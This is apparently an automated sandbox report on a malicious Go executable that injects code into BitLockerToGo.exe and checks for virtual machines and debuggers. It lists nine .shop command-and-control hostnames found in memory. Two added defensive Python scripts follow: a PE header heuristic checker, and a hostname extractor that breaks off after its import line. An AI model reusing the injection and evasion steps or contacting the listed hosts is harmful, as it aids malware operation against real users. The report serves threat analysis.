Source: iq2HxA0SLw.exe, 00000000.00000000.1418035635.00007FF6A92C2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckRegCreateKeyExWRegDeleteValueWmissing address/etc/mdns.allowunknown network is unavailableHanifi_RohingyaPsalter_Pahlavix509usepoliciesinvalid boolean0601021504Z0700non-minimal tagunknown Go typeinvalid padding (no semicolon)alsologtostderrstderrthresholdaccept-encodingaccept-languageAccept-EncodingPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keyheap_idle_bytesstack_sys_bytesmspan_sys_bytesother_sys_bytesprocess_max_fdsduplicated name"UNIMPLEMENTED"InvalidArgumentUnauthenticatedUNAUTHENTICATEDinvalid kind %vCardinality(%d)weak_dependencyextension_rangeproto3_optionalunverified_lazyfeature_supportutf8_validationaggregate_valueedition_removedExcludeClipRectGetEnhMetaFileWGetTextMetricsWPlayEnhMetaFileGdiplusShutdownGetThreadLocaleOleUninitializewglGetCurrentDCDragAcceptFilesCallWindowProcWCreatePopupMenuCreateWindowExWDialogBoxParamWGetActiveWindowGetDpiForWindowGetRawInputDataInsertMenuItemWIsWindowEnabledPostQuitMessageSetActiveWindowSetWinEventHookTrackMouseEventWindowFromPointDrawThemeTextExmodulus by zerogetMillisecondsGroup: bad kindempty signature not a functionreflectlite.Setjstmpllitinterptarinsecurepathzipinsecurepathinvalid pointerBelowExactAboveResponseTimeoutMissingEndpoint#multipartfilesAccept-LanguageX-Forwarded-For()<>@,;:\"/[]?=GAUGE_HISTOGRAMAuthInfo is nilAuthInfo: <nil>15:04:05.000000/debug/requestsCLSIDFromProgIDStringFromCLSIDTLS_VERSION_1_0TLS_VERSION_1_1TLS_VERSION_1_2TLS_VERSION_1_3unclosed actionno dot in fieldtemplate clauseEurope (Zurich)Europe 
(London)access-analyzerapi.iotwirelessapi.mediatailorarc-zonal-shiftcloudcontrolapicloudtrail-datadata.mediastorefips-af-south-1fips-ap-south-1fips-ap-south-2fips-eu-north-1fips-eu-south-1fips-eu-south-2fips-me-south-1aws-marketplaceaws-global-fipsinternetmonitordata-ap-south-1af-south-1-fipsap-south-1-fipsap-south-2-fipseu-north-1-fipseu-south-1-fipseu-south-2-fipsme-south-1-fipslicense-managermachinelearningmessaging-chimemobileanalyticsmturk-requesterfips-aws-globalmobiletargetingresource-groupsroute53resolverwellarchitectedui-ca-central-1ui-eu-central-1China (Beijing)China (Ningxia)fips-cn-north-1data-cn-north-1avx512vpopcntdqcontenteditablehtml/template: NO_SIDE_EFFECTSLEGACY_REQUIREDLENGTH_PREFIXEDDiacriticalDot;DoubleRightTee;DownLeftVector;GreaterGreater;HorizontalLine;InvisibleComma;InvisibleTimes;LeftDownVector;LeftRightArrow;Leftrightarrow;LessSlantEqual;LongRightArrow;Longrightarrow;LowerLeftArrow;NestedLessLess;NotGreaterLess;NotLessGreater;NotSubsetEqual;NotVerticalBar;OpenCurlyQuote;ReverseElement;RightTeeVector;RightVectorBar;ShortDownArrow;ShortLeftArrow;SquareSuperset;TildeFullEqual;UpperLeftArrow;ZeroWidthSpace;curvearrowleft;doublebarwedge;downdownarrows;hookrightarrow;leftleftarrows;leftrightarrow;leftthreetimes;longrightarrow;looparrowright;nshortparallel;ntriangleright;rightarrowtail;rightharpoonup;trianglelefteq;upharpoonright;Co memstr_477571fa-d

System Summary

Source: 00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A0161 5_2_029A0161
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02970770 5_2_02970770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029AB280 5_2_029AB280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029AA2AE 5_2_029AA2AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02969230 5_2_02969230
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296139D 5_2_0296139D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029673F0 5_2_029673F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298A324 5_2_0298A324
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296135B 5_2_0296135B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0297037F 5_2_0297037F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02965360 5_2_02965360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029880AF 5_2_029880AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A90F0 5_2_029A90F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02961000 5_2_02961000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02967030 5_2_02967030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02993024 5_2_02993024
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298E19C 5_2_0298E19C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A97BB 5_2_029A97BB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029687C0 5_2_029687C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298E740 5_2_0298E740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02963770 5_2_02963770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02983770 5_2_02983770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296A480 5_2_0296A480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298E419 5_2_0298E419
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02988446 5_2_02988446
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0297F467 5_2_0297F467
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296B460 5_2_0296B460
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A0580 5_2_029A0580
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029985A0 5_2_029985A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02996A80 5_2_02996A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A7BB0 5_2_029A7BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A8BE0 5_2_029A8BE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A5850 5_2_029A5850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02971870 5_2_02971870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296A940 5_2_0296A940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298EE86 5_2_0298EE86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02967E20 5_2_02967E20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02973F86 5_2_02973F86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02992FA9 5_2_02992FA9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296AFD0 5_2_0296AFD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298BF1C 5_2_0298BF1C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0299EF10 5_2_0299EF10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296BF70 5_2_0296BF70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02996C90 5_2_02996C90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A9CF0 5_2_029A9CF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298ECF4 5_2_0298ECF4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A9C00 5_2_029A9C00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A4D00 5_2_029A4D00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02969D78 5_2_02969D78
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0296CAF0 appears 55 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 0297D8A0 appears 164 times
Source: iq2HxA0SLw.exe Static PE information: Number of sections : 12 > 10
Source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs iq2HxA0SLw.exe
Source: iq2HxA0SLw.exe, 00000000.00000002.1864836224.00007FF6A9EAF000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs iq2HxA0SLw.exe
Source: iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs iq2HxA0SLw.exe
Source: iq2HxA0SLw.exe Binary or memory string: OriginalFileName vs iq2HxA0SLw.exe
Source: 00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engine Classification label: mal100.troj.evad.winEXE@3/0@2/1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0299FAD0 CoCreateInstance, 5_2_0299FAD0
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe File created: C:\Users\Public\Libraries\faboa.scif Jump to behavior
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe File opened: C:\Windows\system32\74a18233676dde97608ee6471dc0c9b5cb8eb3e6e4c279aabd8f7060ccfe423dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Jump to behavior
Source: iq2HxA0SLw.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: iq2HxA0SLw.exe ReversingLabs: Detection: 58%
Source: iq2HxA0SLw.exe String found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine .localhostwsarecvmsgwsasendmsgIP addressunixpacket netGo = RIPEMD-160ChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtraSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1POSTALCODEexecerrdotSYSTEMROOT but have one_outputUSERDOMAINlocal-addrUser-AgentRST_STREAMEND_STREAMSet-Cookie stream=%dset-cookieuser-agentkeep-alive:authorityequivalentHost: %s
Source: iq2HxA0SLw.exe String found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine RegSetValueExWinternal error.in-addr.arpa.unknown mode: unreachable: /log/filter.go/log/helper.godata truncated
Source: iq2HxA0SLw.exe String found in binary or memory: ... omitting > closed by </add_dir_header.WithDeadline(<not Stringer>Content-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMaccept-charsetcontent-length{$} not at endempty wildcardparsing %q: %wNot Acceptableheap_sys_bytesSubConn(id:%d)"OUT_OF_RANGE"ALREADY_EXISTSreserved_rangefield_presenceLoadIconMetricGetStockObjectSetPixelFormatTransparentBltGdiplusStartupActivateActCtxGetLocaleInfoWwglCopyContextwglMakeCurrentPdhAddCounterWDragQueryFileWSHGetFileInfoWClientToScreenCloseClipboardDeferWindowPosDefWindowProcWEmptyClipboardEnableMenuItemGetWindowLongWInvalidateRectNotifyWinEventReleaseCaptureScreenToClientSetWindowLongWTrackPopupMenuUnhookWinEventCloseThemeDataSetWindowThemeGetSystemTimesinvalid kind: \.+*?()|[]{}^$
Source: iq2HxA0SLw.exe String found in binary or memory: net/addrselect.go
Source: iq2HxA0SLw.exe String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: iq2HxA0SLw.exe String found in binary or memory: google.golang.org/grpc@v1.64.1/internal/balancerload/load.go
Source: iq2HxA0SLw.exe String found in binary or memory: YePeApZaEl/load.go
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe File read: C:\Users\user\Desktop\iq2HxA0SLw.exe
Source: unknown Process created: C:\Users\user\Desktop\iq2HxA0SLw.exe "C:\Users\user\Desktop\iq2HxA0SLw.exe"
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Section loaded: umpdc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: version.dll
Source: iq2HxA0SLw.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: iq2HxA0SLw.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: iq2HxA0SLw.exe Static file information: File size 19231232 > 1048576
Source: iq2HxA0SLw.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x65d200
Source: iq2HxA0SLw.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xb2da00
Source: iq2HxA0SLw.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
Source: iq2HxA0SLw.exe Static PE information: section name: .xdata
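The static PE findings above (section count above 10, image base above 0x60000000, a .text section larger than 1 MiB, a non-standard section name, the DllCharacteristics flags) are cheap to reproduce without a library. The following is an added example, not Joe Sandbox code: a hand-rolled PE32+ header parser plus the same checks, run over a constructed header-only PE whose numbers mimic the report. The twelve section names in the constructed sample are assumed for illustration, and the header is not the analysed file.

```python
"""Static PE heuristics of the kind the report lists for iq2HxA0SLw.exe.

Added example (not Joe Sandbox code): a hand-rolled PE32+ header parser
plus the checks "Number of sections > 10", "Image base > 0x60000000",
".text bigger than 0x100000", non-standard section names, W+X sections
and DllCharacteristics flags. build_sample_pe() returns a constructed
header-only PE whose numbers mimic the report; it is not the real sample.
"""
import struct

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".CRT"}
DLL_CHARACTERISTICS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE",
                       0x0100: "NX_COMPAT", 0x8000: "TERMINAL_SERVER_AWARE"}
SCN_MEM_EXECUTE, SCN_MEM_WRITE = 0x20000000, 0x80000000
ONE_MIB = 0x100000


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> sections."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsec, _ts, _symptr, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                            # COFF header is 20 bytes
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ (64-bit) images handled here")
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]   # ImageBase
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]    # DllCharacteristics
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i                          # 40-byte IMAGE_SECTION_HEADER
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _va, rsize, _rptr, _, _, _, _, chars = struct.unpack_from("<IIIIIIHHI", data, off + 8)
        sections.append({"name": name, "vsize": vsize, "rsize": rsize, "chars": chars})
    return {"size": len(data), "image_base": image_base, "dll_chars": dll_chars, "sections": sections}


def heuristics(pe: dict) -> list:
    """Return report-style finding strings for a parsed header."""
    out = []
    if len(pe["sections"]) > 10:
        out.append(f"Number of sections : {len(pe['sections'])} > 10")
    if pe["image_base"] > 0x60000000:
        out.append(f"Image base {pe['image_base']:#x} > 0x60000000")
    if pe["size"] > 1048576:
        out.append(f"File size {pe['size']} > 1048576")
    for s in pe["sections"]:
        if s["vsize"] > ONE_MIB:
            out.append(f"Virtual size of {s['name']} is bigger than: {ONE_MIB:#x}")
        if s["rsize"] > ONE_MIB:
            out.append(f"Raw size of {s['name']} is bigger than: {ONE_MIB:#x} < {s['rsize']:#x}")
        if s["name"] not in STANDARD_SECTIONS:
            out.append(f"section name: {s['name']}")
        if s["chars"] & SCN_MEM_EXECUTE and s["chars"] & SCN_MEM_WRITE:
            out.append(f"section {s['name']} is writable and executable")
    flags = [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if pe["dll_chars"] & bit]
    if flags:
        out.append(", ".join(flags))
    return out


def build_sample_pe() -> bytes:
    """Constructed header-only PE32+ (no code) whose numbers mimic the report."""
    names = [b".text", b".rdata", b".data", b".pdata", b".xdata", b".idata",
             b".reloc", b".symtab", b".rsrc", b".tls", b".CRT", b".gosym"]  # assumed names, 12 of them
    e_lfanew, opt_size = 0x80, 240
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x8664, len(names), 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)            # PE32+ magic
    struct.pack_into("<Q", opt, 24, 0x140000000)     # ImageBase as in the report
    struct.pack_into("<H", opt, 70, 0x8160)          # HIGH_ENTROPY_VA|DYNAMIC_BASE|NX_COMPAT|TS_AWARE
    secs = b""
    for i, n in enumerate(names):
        text = n == b".text"
        vsize, rsize = (0x65D000, 0x65D200) if text else (0x1000, 0x1000)
        chars = 0x60000020 if text else 0x40000040   # CODE|EXEC|READ vs INIT_DATA|READ
        secs += n.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, 0x1000 * (i + 1), rsize, 0, 0, 0, 0, 0, chars)
    return dos + b"PE\0\0" + coff + bytes(opt) + secs


if __name__ == "__main__":
    for finding in heuristics(parse_pe(build_sample_pe())):
        print(finding)
```

Only the header is constructed, so the "File size > 1048576" check does not fire on the sample; against the real 19 MB file it would. The W+X check is included because it is the one static anomaly a packed or self-modifying binary usually shows that this report's flag listing does not.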
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6336 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: iq2HxA0SLw.exe, 00000000.00000002.1861210283.0000024538558000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: iq2HxA0SLw.exe, 00000000.00000002.1861210283.0000024538558000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A7130 LdrInitializeThunk, 5_2_029A7130

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000 protect: page execute and read and write
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000 value starts with: 4D5A
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: covvercilverow.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: surroundeocw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: abortinoiwiam.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: pumpkinkwquo.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: priooozekw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: deallyharvenw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: defenddsouneuw.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: racedsuitreow.shop
Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: pianoswimen.shop
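The nine .shop hostnames above were recovered from one memory region of the parent process; they are the indicators a responder wants first. The following is an added example, not the sandbox's own extractor: a strings pass over a memory buffer (ASCII and UTF-16LE) that keeps tokens parsing as hostnames, drops toolchain paths that merely look like hostnames (the Go source paths and DLL names seen elsewhere in this report), de-duplicates and defangs. SAMPLE_DUMP is a constructed buffer that only reuses strings appearing on this page; the UTF-16LE copy of one domain is included to exercise the wide-string path and is an assumption, not an observation from the report.

```python
"""Pull candidate C2 hostnames out of a process memory dump.

Added example, not the sandbox's extractor. It runs a strings pass over a
byte buffer (ASCII and UTF-16LE), keeps tokens that parse as hostnames,
drops file-name look-alikes (Go sources, DLLs), de-duplicates and defangs.
SAMPLE_DUMP is constructed; it only reuses strings that appear in this report.
"""
import re

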